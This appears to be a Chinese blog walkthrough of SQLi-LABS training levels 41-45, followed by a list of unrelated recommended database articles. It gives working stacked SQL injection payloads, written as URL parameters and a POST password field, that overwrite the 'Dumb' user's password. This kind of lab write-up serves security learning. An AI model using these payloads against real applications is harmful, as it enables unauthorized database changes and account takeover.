SQLi-LABS通关攻略【41-45】

SQLi-LABS 41关

这一关是堆叠注入

测试闭合

?id=1' //回显错误

?id=1'--+ //回显错误

?id=1--+ //回显正确

所以是数字型的注入

测试堆叠注入,更改Dumb的密码

?id=1;update users set password='123456' where username='Dumb'--+

SQLi-LABS 42关

这一关使用的是post传参,所以需要进行抓包,依旧是堆叠注入

在密码处进行堆叠注入,更新Dumb的密码为123

返回登录测试是否更改成功

SQLi-LABS 43关

这一关和上一关一样,都是密码处是堆叠注入,只不过闭合方式是单引号加括号

1'); update users set password='666' where username='Dumb' --+

SQLi-LABS 44关

这一关和四十二关一样

SQLi-LABS 45关

这一关和四十三关一样,都不在赘述

相关推荐
一 乐几秒前
网红酒店|基于java的网红酒店预定系统(源码+数据库+文档)
java·数据库·学习·小程序·酒店管理·网红
LL小蜗牛9 分钟前
sharding-jdbc metadata load优化(4.1.1版本)
java·数据库
终末圆31 分钟前
JDBC与MyBatis:数据库访问技术的变迁【后端 15】
前端·数据结构·数据库·后端·算法·mybatis·jdbc
不会敲代码阿37 分钟前
mysql 日志恢复
java·数据库·mysql
迷茫运维路1 小时前
MySQL基于GTID同步模式搭建主从复制
运维·数据库·mysql
smileNicky1 小时前
Redis系列之底层数据结构SDS
数据结构·数据库·redis
baidu_huihui1 小时前
ubuntu打包命令
数据库·postgresql·zip
施小赞2 小时前
HBase
linux·数据库·hbase
小龙在慢慢变强..2 小时前
Ansible使用kubeadm方式一键安装k8s
数据库
编程乐趣2 小时前
ZoneTree: 高性能ACID兼容的.NET有序键值数据库
数据库·.net